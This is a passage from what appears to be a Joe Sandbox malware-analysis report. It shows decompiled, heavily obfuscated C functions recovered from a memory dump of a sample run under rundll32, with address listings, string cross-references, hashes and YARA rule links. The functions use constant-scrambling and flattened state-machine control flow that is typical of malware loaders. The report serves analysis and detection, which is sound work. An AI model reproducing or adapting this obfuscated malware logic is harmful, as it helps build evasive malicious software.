				signed int _v156;
				void* _t137;
				intOrPtr* _t157;
				signed int _t166;
				void* _t173;
				intOrPtr _t191;
				void* _t203;
				void* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				intOrPtr* _t213;
				void* _t215;
				void* _t216;
				void* _t218;

				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007B20B9(_t137);
				_v136 = 0x2c5bc;
				_t216 = _t215 + 0xc;
				_t208 = 0;
				_t173 = 0xf62a13b;
				_t209 = 0x63;
				_v136 = _v136 / _t209;
				_v136 = _v136 + 0xe356;
				_v136 = _v136 ^ 0x000982ba;
				_v156 = 0x35028b;
				_v156 = _v156 | 0x143a760d;
				_v156 = _v156 + 0xfffff236;
				_v156 = _v156 ^ 0x8a3e1055;
				_v156 = _v156 ^ 0x9e033c32;
				_v128 = 0xf43d73;
				_v128 = _v128 | 0xd1983256;
				_v128 = _v128 ^ 0xd1f71de4;
				_v120 = 0x9951cf;
				_v120 = _v120 + 0xffffd11b;
				_v120 = _v120 ^ 0x00948e71;
				_v152 = 0x57fc5b;
				_v152 = _v152 | 0x88a856bb;
				_v152 = _v152 << 9;
				_v152 = _v152 + 0xa27f;
				_v152 = _v152 ^ 0xfff91174;
				_v116 = 0x3d6e6b;
				_t210 = 9;
				_v116 = _v116 / _t210;
				_v116 = _v116 ^ 0x0006b75d;
				_v140 = 0x916f20;
				_t211 = 0x35;
				_v140 = _v140 * 0x22;
				_v140 = _v140 / _t211;
				_t212 = 0x7b;
				_v140 = _v140 * 0x1d;
				_v140 = _v140 ^ 0x0a9423e2;
				_v148 = 0x96f30f;
				_v148 = _v148 ^ 0x6547be83;
				_v148 = _v148 << 9;
				_v148 = _v148 | 0xa101889a;
				_v148 = _v148 ^ 0xa391ec3d;
				_v124 = 0x9e8998;
				_v124 = _v124 | 0x73c531f9;
				_v124 = _v124 ^ 0x73d6e9c9;
				_v132 = 0xda1f74;
				_v132 = _v132 + 0x97a0;
				_v132 = _v132 ^ 0xdacfb227;
				_v132 = _v132 ^ 0xda161b2e;
				_v144 = 0x87027b;
				_t213 = _v128;
				_v144 = _v144 / _t212;
				_v144 = _v144 + 0x3568;
				_v144 = _v144 | 0x38a39b99;
				_v144 = _v144 ^ 0x38a88a96;
				while(1) {
					_t218 = _t173 - 0x628c872;
					if(_t218 > 0) {
						goto L25;
					}
					L2:
					if(_t218 == 0) {
						_push(_t173);
						_push(_t173);
						_t203 = 0x50;
						_t213 = E007A7FF2(_t203);
						__eflags = _t213;
						if(__eflags == 0) {
							L16:
							_t173 = 0xe7b6043;
							continue;
							do {
								while(1) {
									_t218 = _t173 - 0x628c872;
									if(_t218 > 0) {
										goto L25;
									}
									goto L2;
								}
								goto L25;
								L45:
								__eflags = _t173 - 0xee0c843;
							} while (__eflags != 0);
							L46:
							return _t208;
						}
						_t173 = 0xf1dea2;
						 *((intOrPtr*)(_t213 + 0x24)) = _v92;
						 *((intOrPtr*)(_t213 + 0x3c)) = _v80;
						 *((intOrPtr*)(_t213 + 0x20)) = _v72;
						continue;
					}
					if(_t173 == 0xf1dea2) {
						__eflags = _v84 - 1;
						if(__eflags == 0) {
							E007B4B87( &_v108);
							L13:
							_t173 = 0x4d68783;
							continue;
						}
						_t173 = 0x9ca47b0;
						continue;
					}
					if(_t173 == 0x1c23c86) {
						__eflags = _v84 - 4;
						if(__eflags == 0) {
							E007B6DF8( &_v108);
							goto L13;
						}
						_t173 = 0x6a06f56;
						continue;
					}
					if(_t173 == 0x45d7e1c) {
						_t157 = E007BD97D( &_v40, _v120, __eflags, _v152,  &_v48, _v116);
						_t216 = _t216 + 0xc;
						__eflags = _t157;
						if(__eflags == 0) {
							goto L46;
						}
						goto L16;
					}
					if(_t173 == 0x483085d) {
						__eflags = _v84 - 7;
						if(__eflags == 0) {
							E007B0E53( &_v108);
						}
						goto L13;
					}
					if(_t173 == 0x4d68783) {
						_t191 =  *0x7c3208; // 0x0
						_t208 = _t208 + 1;
						 *_t213 =  *((intOrPtr*)(_t191 + 0x20c));
						 *((intOrPtr*)(_t191 + 0x20c)) = _t213;
						L10:
						_t173 = 0x45d7e1c;
						continue;
					}
					if(_t173 != 0x4fb7fc6) {
						goto L45;
					}
					E007B0B19(0);
					goto L10;
					L25:
					__eflags = _t173 - 0x6a06f56;
					if(_t173 == 0x6a06f56) {
						__eflags = _v84 - 5;
						if(__eflags == 0) {
							E007AB74D( &_v108, _t213);
							_t173 = 0x4d68783;
							goto L45;
						}
						_t173 = 0xcf2e7b4;
						continue;
					}
					__eflags = _t173 - 0x9a20357;
					if(_t173 == 0x9a20357) {
						__eflags = _v84 - 3;
						if(__eflags == 0) {
							E007B1889( &_v108);
							goto L13;
						}
						_t173 = 0x1c23c86;
						continue;
					}
					__eflags = _t173 - 0x9ca47b0;
					if(_t173 == 0x9ca47b0) {
						__eflags = _v84 - 2;
						if(__eflags == 0) {
							E007A9714( &_v108, _t213);
							goto L13;
						}
						_t173 = 0x9a20357;
						continue;
					}
					__eflags = _t173 - 0xcf2e7b4;
					if(_t173 == 0xcf2e7b4) {
						__eflags = _v84 - 6;
						if(__eflags == 0) {
							E007AF09B( &_v108);
							goto L13;
						}
						_t173 = 0x483085d;
						continue;
					}
					__eflags = _t173 - 0xe7b6043;
					if(_t173 == 0xe7b6043) {
						_t166 = E007AE5CF( &_v48, _v140,  &_v112, _v148);
						asm("sbb ecx, ecx");
						_t173 = ( ~_t166 & 0x01cb4a56) + 0x45d7e1c;
						continue;
					}
					__eflags = _t173 - 0xf62a13b;
					if(_t173 != 0xf62a13b) {
						goto L45;
					}
					E007A3DBC( &_v40, _a4, _v136, _v156, _v128);
					_t216 = _t216 + 0xc;
					_t173 = 0x4fb7fc6;
				}
			}

0x007ab2d1
0x007ab2d8
0x007ab2d9
0x007ab2da
0x007ab2df
0x007ab2e7
0x007ab2f0
0x007ab2f2
0x007ab303
0x007ab308
0x007ab30e
0x007ab316
0x007ab31e
0x007ab326
0x007ab32e
0x007ab336
0x007ab33e
0x007ab346
0x007ab34e
0x007ab356
0x007ab35e
0x007ab366
0x007ab36e
0x007ab376
0x007ab37e
0x007ab386
0x007ab38b
0x007ab393
0x007ab39b
0x007ab3a7
0x007ab3ac
0x007ab3b2
0x007ab3ba
0x007ab3c7
0x007ab3ca
0x007ab3d6
0x007ab3df
0x007ab3e0
0x007ab3e4
0x007ab3ec
0x007ab3f4
0x007ab3fc
0x007ab401
0x007ab409
0x007ab411
0x007ab419
0x007ab421
0x007ab429
0x007ab431
0x007ab439
0x007ab441
0x007ab449
0x007ab457
0x007ab45b
0x007ab45f
0x007ab467
0x007ab46f
0x007ab477
0x007ab477
0x007ab47d
0x00000000
0x00000000
0x007ab483
0x007ab483
0x007ab56e
0x007ab56f
0x007ab572
0x007ab578
0x007ab57c
0x007ab57e
0x007ab520
0x007ab520
0x007ab525
0x007ab477
0x007ab477
0x007ab477
0x007ab47d
0x00000000
0x00000000
0x00000000
0x007ab47d
0x00000000
0x007ab6b6
0x007ab6b6
0x007ab6b6
0x007ab6c2
0x007ab6ce
0x007ab6ce
0x007ab584
0x007ab589
0x007ab590
0x007ab597
0x00000000
0x007ab597
0x007ab48f
0x007ab546
0x007ab54b
0x007ab55b
0x007ab4e6
0x007ab4e6
0x00000000
0x007ab4e6
0x007ab54d
0x00000000
0x007ab54d
0x007ab49b
0x007ab52a
0x007ab52f
0x007ab53f
0x00000000
0x007ab53f
0x007ab531
0x00000000
0x007ab531
0x007ab4a3
0x007ab510
0x007ab515
0x007ab518
0x007ab51a
0x00000000
0x00000000
0x00000000
0x007ab51a
0x007ab4ab
0x007ab4df
0x007ab4e4
0x007ab4ee
0x007ab4ee
0x00000000
0x007ab4e4
0x007ab4af
0x007ab4c8
0x007ab4ce
0x007ab4d5
0x007ab4d7
0x007ab4c4
0x007ab4c4
0x00000000
0x007ab4c4
0x007ab4b7
0x00000000
0x00000000
0x007ab4bf
0x00000000
0x007ab59f
0x007ab59f
0x007ab5a5
0x007ab698
0x007ab69d
0x007ab6af
0x007ab6b4
0x00000000
0x007ab6b4
0x007ab69f
0x00000000
0x007ab69f
0x007ab5ab
0x007ab5b1
0x007ab679
0x007ab67e
0x007ab68e
0x00000000
0x007ab68e
0x007ab680
0x00000000
0x007ab680
0x007ab5b7
0x007ab5bd
0x007ab658
0x007ab65d
0x007ab66f
0x00000000
0x007ab66f
0x007ab65f
0x00000000
0x007ab65f
0x007ab5c3
0x007ab5c9
0x007ab639
0x007ab63e
0x007ab64e
0x00000000
0x007ab64e
0x007ab640
0x00000000
0x007ab640
0x007ab5cb
0x007ab5d1
0x007ab61f
0x007ab62a
0x007ab632
0x00000000
0x007ab632
0x007ab5d3
0x007ab5d9
0x00000000
0x00000000
0x007ab5f9
0x007ab5fe
0x007ab601
0x007ab601

Strings

V, xrefs: 007AB30E
h5, xrefs: 007AB45F
kn=, xrefs: 007AB39B

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: V$h5$kn=
API String ID: 0-2568719763
Opcode ID: c17df22f1f6c4ca383d20846d094cf61e18562d47653f970da897501ba626721
Instruction ID: 0c96d806bdf8332ad219558c6084e27ea930c5dae0c68a4e2fd42ce5ed5adc58
Opcode Fuzzy Hash: c17df22f1f6c4ca383d20846d094cf61e18562d47653f970da897501ba626721
Instruction Fuzzy Hash: 0FA19A71508380CBC728DF65D49956FBBE1FBCA308F144A2EF19686262D7399A49CF43

Uniqueness

Uniqueness Score: -1.00%

Function 007B4116 Relevance: 4.0, Strings: 3, Instructions: 223
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E007B4116() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _t220;
				signed int _t222;
				void* _t224;
				void* _t226;
				void* _t227;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t250;
				void* _t253;
				void* _t258;
				void* _t260;

				_v604 = 0x9b146b;
				_v604 = _v604 | 0x658b3ccc;
				_v604 = _v604 + 0xfffff1f3;
				_v604 = _v604 ^ 0x659b2e62;
				_v596 = 0xb07d39;
				_v596 = _v596 | 0x89b98cff;
				_v596 = _v596 ^ 0x89b9fdfe;
				_v584 = 0x342693;
				_v584 = _v584 ^ 0x5537c6ac;
				_v584 = _v584 ^ 0x5503e03c;
				_v628 = 0x844a73;
				_v628 = _v628 | 0x8aea995b;
				_v628 = _v628 >> 3;
				_v628 = _v628 ^ 0x3316179a;
				_v628 = _v628 ^ 0x224eeca0;
				_v644 = 0xac1c02;
				_v644 = _v644 * 0x6d;
				_t227 = 0;
				_v644 = _v644 << 0xf;
				_t253 = 0x9728f62;
				_t229 = 0x52;
				_v644 = _v644 * 0x23;
				_v644 = _v644 ^ 0xb0e78180;
				_v636 = 0x949b2b;
				_v636 = _v636 / _t229;
				_v636 = _v636 << 4;
				_t230 = 0x48;
				_v636 = _v636 / _t230;
				_v636 = _v636 ^ 0x000805f9;
				_v652 = 0x50f951;
				_v652 = _v652 << 0xe;
				_v652 = _v652 + 0xffff7357;
				_v652 = _v652 >> 5;
				_v652 = _v652 ^ 0x01f330c3;
				_v624 = 0xa7ee55;
				_v624 = _v624 + 0x328f;
				_t231 = 0x36;
				_v624 = _v624 / _t231;
				_v624 = _v624 + 0x3260;
				_v624 = _v624 ^ 0x000caec1;
				_v632 = 0x45b476;
				_v632 = _v632 << 0xf;
				_v632 = _v632 + 0x3fe9;
				_v632 = _v632 + 0xffffc242;
				_v632 = _v632 ^ 0xda30ae70;
				_v576 = 0xb3f46f;
				_v576 = _v576 >> 0xe;
				_v576 = _v576 ^ 0x000becca;
				_v640 = 0x899e10;
				_v640 = _v640 << 3;
				_v640 = _v640 | 0x15c6522a;
				_v640 = _v640 >> 0xc;
				_v640 = _v640 ^ 0x00018fe0;
				_v648 = 0x6b2405;
				_v648 = _v648 | 0xec8a856c;
				_v648 = _v648 + 0xffffe7b2;
				_v648 = _v648 >> 0xd;
				_v648 = _v648 ^ 0x000a0717;
				_v608 = 0xd62f5d;
				_v608 = _v608 + 0xffffa804;
				_v608 = _v608 >> 1;
				_v608 = _v608 ^ 0x00686b18;
				_v580 = 0x2fce72;
				_t232 = 6;
				_v580 = _v580 / _t232;
				_v580 = _v580 ^ 0x000627ef;
				_v612 = 0xa7d19a;
				_v612 = _v612 ^ 0x125f9685;
				_v612 = _v612 ^ 0x35fdcbd7;
				_v612 = _v612 ^ 0x270c67d8;
				_v656 = 0x784491;
				_v656 = _v656 >> 9;
				_v656 = _v656 | 0xfbff7fff;
				_v656 = _v656 ^ 0xfbf9abc9;
				_v616 = 0xc21bdd;
				_t233 = 0x58;
				_v616 = _v616 / _t233;
				_v616 = _v616 | 0xde7eb344;
				_v616 = _v616 ^ 0xde714edb;
				_v620 = 0x22ba29;
				_v620 = _v620 + 0xc334;
				_v620 = _v620 ^ 0x41b5236d;
				_v620 = _v620 ^ 0x4193ad78;
				_v588 = 0x61092c;
				_v588 = _v588 | 0xfbe761ce;
				_v588 = _v588 ^ 0xfbe7142a;
				_v600 = 0xd9609d;
				_v600 = _v600 | 0x95d54fcb;
				_v600 = _v600 ^ 0x95d705b7;
				_v592 = 0xc80f6b;
				_t234 = 0x42;
				_t252 = _v600;
				_v592 = _v592 / _t234;
				_v592 = _v592 ^ 0x0000156e;
				do {
					while(_t253 != 0x25f6a69) {
						if(_t253 == 0x9728f62) {
							_t253 = 0xea70970;
							continue;
						} else {
							if(_t253 == 0x9c0fe90) {
								_t250 = _v632;
								_t220 = E007A8F65(_v624, _t250,  &_v524, _v576, _t227, _v624, _v604, _v640, _v584, _v648, _v624, _v596);
								_t252 = _t220;
								_t260 = _t260 + 0x28;
								__eflags = _t220 - 0xffffffff;
								if(__eflags != 0) {
									_t253 = 0xaccbeb9;
									continue;
								}
							} else {
								if(_t253 == 0xaccbeb9) {
									_t222 = E007A9350( &_v564, _t252, _v608, _v580, _t234, _v612);
									asm("sbb esi, esi");
									_t250 = _v616;
									_t253 = ( ~_t222 & 0x010509a4) + 0x15a60c5;
									_t234 = _v656;
									E007B1E67(_v656, _t250, _v620, _v588, _t252);
									_t260 = _t260 + 0x20;
									goto L14;
								} else {
									if(_t253 == 0xdba0984) {
										_t224 = E007BABD1();
										_t258 = _v572 - _v548;
										asm("sbb ecx, [esp+0x84]");
										__eflags = _v568 - _t250;
										if(__eflags >= 0) {
											if(__eflags > 0) {
												L19:
												_t227 = 1;
												__eflags = 1;
											} else {
												__eflags = _t258 - _t224;
												if(_t258 >= _t224) {
													goto L19;
												}
											}
										}
									} else {
										_t268 = _t253 - 0xea70970;
										if(_t253 != 0xea70970) {
											goto L14;
										} else {
											_t250 = _v644;
											_t234 = _v628;
											_t226 = E007BDA22(_v628, _t250, _t268, _v636,  &_v524, _v628, _v652);
											_t260 = _t260 + 0x10;
											if(_t226 != 0) {
												_t253 = 0x9c0fe90;
												continue;
											}
										}
									}
								}
							}
						}
						L20:
						return _t227;
					}
					E007BC1EC(_v600, _v592,  &_v572);
					_pop(_t234);
					_t253 = 0xdba0984;
					L14:
					__eflags = _t253 - 0x15a60c5;
				} while (__eflags != 0);
				goto L20;
			}

0x007b411c
0x007b4126
0x007b412e
0x007b4136
0x007b413e
0x007b4146
0x007b414e
0x007b4156
0x007b415e
0x007b4166
0x007b416e
0x007b4176
0x007b417e
0x007b4183
0x007b418b
0x007b4193
0x007b41a4
0x007b41a8
0x007b41aa
0x007b41af
0x007b41bb
0x007b41be
0x007b41c2
0x007b41ca
0x007b41da
0x007b41de
0x007b41e7
0x007b41ec
0x007b41f2
0x007b41fa
0x007b4202
0x007b4207
0x007b420f
0x007b4214
0x007b421c
0x007b4224
0x007b4230
0x007b4233
0x007b4237
0x007b423f
0x007b4247
0x007b424f
0x007b4254
0x007b425c
0x007b4264
0x007b426c
0x007b4274
0x007b4279
0x007b4281
0x007b4289
0x007b428e
0x007b4296
0x007b429b
0x007b42a3
0x007b42ab
0x007b42b3
0x007b42bb
0x007b42c0
0x007b42c8
0x007b42d0
0x007b42d8
0x007b42dc
0x007b42e4
0x007b42f4
0x007b42f9
0x007b42ff
0x007b430c
0x007b4314
0x007b431c
0x007b4324
0x007b432c
0x007b4334
0x007b4339
0x007b4341
0x007b4349
0x007b4355
0x007b435a
0x007b4360
0x007b4368
0x007b4370
0x007b4378
0x007b4380
0x007b4388
0x007b4390
0x007b4398
0x007b43a0
0x007b43a8
0x007b43b0
0x007b43b8
0x007b43c0
0x007b43cc
0x007b43cf
0x007b43d3
0x007b43d7
0x007b43df
0x007b43df
0x007b43f1
0x007b44da
0x00000000
0x007b43f7
0x007b43f9
0x007b44b8
0x007b44c1
0x007b44c6
0x007b44c8
0x007b44cb
0x007b44ce
0x007b44d0
0x00000000
0x007b44d0
0x007b43ff
0x007b4405
0x007b445e
0x007b446a
0x007b447b
0x007b447f
0x007b4485
0x007b4489
0x007b448e
0x00000000
0x007b4407
0x007b440d
0x007b450a
0x007b4513
0x007b451e
0x007b4525
0x007b4527
0x007b4529
0x007b452f
0x007b4531
0x007b4531
0x007b452b
0x007b452b
0x007b452d
0x00000000
0x00000000
0x007b452d
0x007b4529
0x007b4413
0x007b4413
0x007b4419
0x00000000
0x007b441f
0x007b4430
0x007b4434
0x007b4438
0x007b443d
0x007b4442
0x007b4448
0x00000000
0x007b4448
0x007b4442
0x007b4419
0x007b440d
0x007b4405
0x007b43f9
0x007b4535
0x007b453e
0x007b453e
0x007b44f1
0x007b44f6
0x007b44f7
0x007b44fc
0x007b44fc
0x007b44fc
0x00000000

Strings

?, xrefs: 007B4254
,a, xrefs: 007B4390
`2, xrefs: 007B4237

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,a$`2$?
API String ID: 0-2087061617
Opcode ID: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
Instruction ID: 2fff0b6a859ff762577e5a61257495a57e9210f0b21cc1c2d4f53d8e58a4703f
Opcode Fuzzy Hash: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
Instruction Fuzzy Hash: CAA111725083819FC368CF65C98A54BFBF1BBC5718F008A1DF5DA96260D3B58A19CF46

Uniqueness

Uniqueness Score: -1.00%

Function 007A59F2 Relevance: 4.0, Strings: 3, Instructions: 202
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E007A59F2() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				void* _t202;
				void* _t208;
				intOrPtr _t209;
				void* _t214;
				void* _t222;
				intOrPtr _t237;
				intOrPtr _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int* _t247;

				_t247 =  &_v1140;
				_v1056 = 0x36f622;
				_v1052 = 0x8ed67e;
				_t214 = 0xf737bb2;
				_v1048 = 0x93fb3c;
				_t240 = 0;
				_v1044 = 0;
				_v1076 = 0x48eb17;
				_v1076 = _v1076 + 0x189d;
				_v1076 = _v1076 ^ 0x00442401;
				_v1100 = 0xa45863;
				_v1100 = _v1100 << 2;
				_t241 = 0x1d;
				_v1100 = _v1100 * 0x7c;
				_v1100 = _v1100 ^ 0x3e6538f4;
				_v1108 = 0x56f1ad;
				_v1108 = _v1108 | 0xbff0a597;
				_v1108 = _v1108 / _t241;
				_v1108 = _v1108 ^ 0x06946226;
				_v1132 = 0xc3fd0a;
				_v1132 = _v1132 << 8;
				_v1132 = _v1132 + 0xffff9bc2;
				_t242 = 0x18;
				_v1132 = _v1132 / _t242;
				_v1132 = _v1132 ^ 0x0821d39f;
				_v1068 = 0xc66dea;
				_v1068 = _v1068 + 0xffff0514;
				_v1068 = _v1068 ^ 0x00c0919e;
				_v1136 = 0x72811d;
				_v1136 = _v1136 ^ 0x5ea2c622;
				_t243 = 0x5d;
				_v1136 = _v1136 * 0x4f;
				_v1136 = _v1136 * 0x41;
				_v1136 = _v1136 ^ 0xd3c4c324;
				_v1096 = 0x2e25e6;
				_v1096 = _v1096 ^ 0xbdbebaf9;
				_v1096 = _v1096 ^ 0xbd932287;
				_v1060 = 0x3d42d8;
				_v1060 = _v1060 << 6;
				_v1060 = _v1060 ^ 0x0f5887f2;
				_v1116 = 0xec9c1f;
				_v1116 = _v1116 >> 1;
				_v1116 = _v1116 + 0xcef9;
				_v1116 = _v1116 ^ 0x0078140d;
				_v1084 = 0xf6a299;
				_v1084 = _v1084 >> 9;
				_v1084 = _v1084 ^ 0x00023821;
				_v1124 = 0xf6e97d;
				_v1124 = _v1124 + 0xffff8c4c;
				_v1124 = _v1124 / _t243;
				_v1124 = _v1124 | 0xda1c672f;
				_v1124 = _v1124 ^ 0xda1e012d;
				_v1120 = 0x9bdb66;
				_v1120 = _v1120 * 0x47;
				_v1120 = _v1120 + 0xdb13;
				_v1120 = _v1120 * 0x64;
				_v1120 = _v1120 ^ 0xe2e3c71f;
				_v1112 = 0x9fec0e;
				_v1112 = _v1112 << 0xc;
				_v1112 = _v1112 | 0xd7512eb2;
				_v1112 = _v1112 ^ 0xffdc645c;
				_v1104 = 0xc74eee;
				_v1104 = _v1104 + 0x930c;
				_v1104 = _v1104 ^ 0x28280d38;
				_v1104 = _v1104 ^ 0x28ef0d26;
				_v1064 = 0xc36095;
				_v1064 = _v1064 | 0x2d8f7273;
				_v1064 = _v1064 ^ 0x2dcb1501;
				_v1140 = 0xa3c477;
				_v1140 = _v1140 ^ 0xb16da3ec;
				_v1140 = _v1140 ^ 0x8917fdcb;
				_v1140 = _v1140 >> 0xe;
				_v1140 = _v1140 ^ 0x000e0fa0;
				_v1128 = 0x58136;
				_v1128 = _v1128 << 6;
				_v1128 = _v1128 << 0x10;
				_v1128 = _v1128 + 0xffffe729;
				_v1128 = _v1128 ^ 0x4d79f308;
				_v1072 = 0x735c84;
				_t244 = 0x7f;
				_v1072 = _v1072 / _t244;
				_v1072 = _v1072 ^ 0x0002b970;
				_v1080 = 0x91f75b;
				_v1080 = _v1080 + 0xffffc39e;
				_v1080 = _v1080 ^ 0x009f463e;
				_v1088 = 0xdf4dcf;
				_v1088 = _v1088 | 0x05792173;
				_v1088 = _v1088 ^ 0x05f69aec;
				_v1092 = 0xf44447;
				_v1092 = _v1092 * 0x78;
				_v1092 = _v1092 ^ 0x728504a1;
				do {
					while(_t214 != 0x89b0ee) {
						if(_t214 == 0x291094f) {
							E007A3C3C(_v1072, _v1080,  &_v1040, _v1088, _v1092);
						} else {
							if(_t214 == 0x6a25a64) {
								E007BDA22(_v1076, _v1100, __eflags, _v1108,  &_v520, _t214, _v1132);
								_t247 =  &(_t247[4]);
								_t214 = 0xe0c4196;
								continue;
							} else {
								if(_t214 == 0xe0c4196) {
									_push(_v1096);
									_push(_v1136);
									_t208 = E007BDCF7(_v1068, 0x7a1000, __eflags);
									_pop(_t222);
									_t209 =  *0x7c3e10; // 0x0
									_t237 =  *0x7c3e10; // 0x0
									E007A47CE(_t237 + 0x23c, _v1060, _t222, _v1116, _v1084, _t208, _t209 + 0x1c, _v1124, _v1120);
									E007AA8B0(_v1112, _t208, _v1104);
									_t247 =  &(_t247[9]);
									_t214 = 0x89b0ee;
									continue;
								} else {
									if(_t214 != 0xf737bb2) {
										goto L10;
									} else {
										_t214 = 0x6a25a64;
										continue;
									}
								}
							}
						}
						L13:
						return _t240;
					}
					_push(_v1128);
					_push( &_v1040);
					_push(_v1140);
					_t202 = E007C13AD(_v1064,  &_v520, __eflags);
					_t247 =  &(_t247[3]);
					__eflags = _t202;
					_t240 =  !=  ? 1 : _t240;
					_t214 = 0x291094f;
					L10:
					__eflags = _t214 - 0xb653a05;
				} while (__eflags != 0);
				goto L13;
			}

0x007a59f2
0x007a59f8
0x007a5a02
0x007a5a0a
0x007a5a0f
0x007a5a1b
0x007a5a1d
0x007a5a21
0x007a5a29
0x007a5a31
0x007a5a39
0x007a5a41
0x007a5a4d
0x007a5a50
0x007a5a54
0x007a5a5c
0x007a5a64
0x007a5a74
0x007a5a78
0x007a5a80
0x007a5a88
0x007a5a8d
0x007a5a99
0x007a5a9e
0x007a5aa4
0x007a5aac
0x007a5ab4
0x007a5abc
0x007a5ac4
0x007a5acc
0x007a5ad9
0x007a5ada
0x007a5ae3
0x007a5ae7
0x007a5aef
0x007a5af7
0x007a5aff
0x007a5b07
0x007a5b0f
0x007a5b14
0x007a5b1c
0x007a5b24
0x007a5b28
0x007a5b30
0x007a5b38
0x007a5b40
0x007a5b45
0x007a5b4d
0x007a5b55
0x007a5b63
0x007a5b67
0x007a5b6f
0x007a5b77
0x007a5b84
0x007a5b88
0x007a5b95
0x007a5b99
0x007a5ba1
0x007a5ba9
0x007a5bae
0x007a5bb6
0x007a5bbe
0x007a5bc8
0x007a5bd5
0x007a5be2
0x007a5bea
0x007a5bf2
0x007a5bfa
0x007a5c02
0x007a5c0a
0x007a5c12
0x007a5c1a
0x007a5c1f
0x007a5c27
0x007a5c2f
0x007a5c34
0x007a5c39
0x007a5c41
0x007a5c49
0x007a5c57
0x007a5c5a
0x007a5c5e
0x007a5c66
0x007a5c6e
0x007a5c76
0x007a5c7e
0x007a5c86
0x007a5c8e
0x007a5c96
0x007a5ca3
0x007a5ca7
0x007a5caf
0x007a5caf
0x007a5cc1
0x007a5dc8
0x007a5cc7
0x007a5cc9
0x007a5d69
0x007a5d6e
0x007a5d71
0x00000000
0x007a5ccf
0x007a5cd1
0x007a5ce3
0x007a5cec
0x007a5cf4
0x007a5cfa
0x007a5d05
0x007a5d1c
0x007a5d2f
0x007a5d3e
0x007a5d43
0x007a5d46
0x00000000
0x007a5cd3
0x007a5cd9
0x00000000
0x007a5cdf
0x007a5cdf
0x00000000
0x007a5cdf
0x007a5cd9
0x007a5cd1
0x007a5cc9
0x007a5dd0
0x007a5ddc
0x007a5ddc
0x007a5d78
0x007a5d80
0x007a5d81
0x007a5d90
0x007a5d97
0x007a5d9b
0x007a5d9d
0x007a5da0
0x007a5da5
0x007a5da5
0x007a5da5
0x00000000

Strings

&(, xrefs: 007A5A6C
%., xrefs: 007A5AEF
&(, xrefs: 007A5BE2

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &($&($%.
API String ID: 0-466442461
Opcode ID: 5dc7bd0c72eab6929fd9808c20dd8054a644a2b2ea4152950d2ba9ee375f4cfb
Instruction ID: 642d285d501abdf8dc3f0aba8a68e47ceed1f31461a538793e6c9ed03f5ff829
Opcode Fuzzy Hash: 5dc7bd0c72eab6929fd9808c20dd8054a644a2b2ea4152950d2ba9ee375f4cfb
Instruction Fuzzy Hash: 07A130B11093819FC798CF26C58941BFBF2FBC5758F008A1DF5A696220D7B98A09CF46

Uniqueness

Uniqueness Score: -1.00%

Function 007C13AD Relevance: 3.9, Strings: 3, Instructions: 169
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E007C13AD(void* __ecx, void* __edx, void* __eflags) {
				void* _t197;
				signed int _t222;
				signed int _t226;
				void* _t236;
				void* _t245;
				void* _t246;

				_t245 = _t246 - 0x6c;
				_push( *((intOrPtr*)(_t245 + 0x7c)));
				_push( *((intOrPtr*)(_t245 + 0x78)));
				_push( *((intOrPtr*)(_t245 + 0x74)));
				_push(__edx);
				_push(__ecx);
				E007B20B9(_t197);
				 *(_t245 + 0x10) =  *(_t245 + 0x10) & 0x00000000;
				 *(_t245 + 0x14) =  *(_t245 + 0x14) & 0x00000000;
				 *((intOrPtr*)(_t245 + 8)) = 0x9cee1d;
				 *((intOrPtr*)(_t245 + 0xc)) = 0x3f83c9;
				 *(_t245 + 0x38) = 0xf8747;
				 *(_t245 + 0x38) =  *(_t245 + 0x38) | 0x414cebc6;
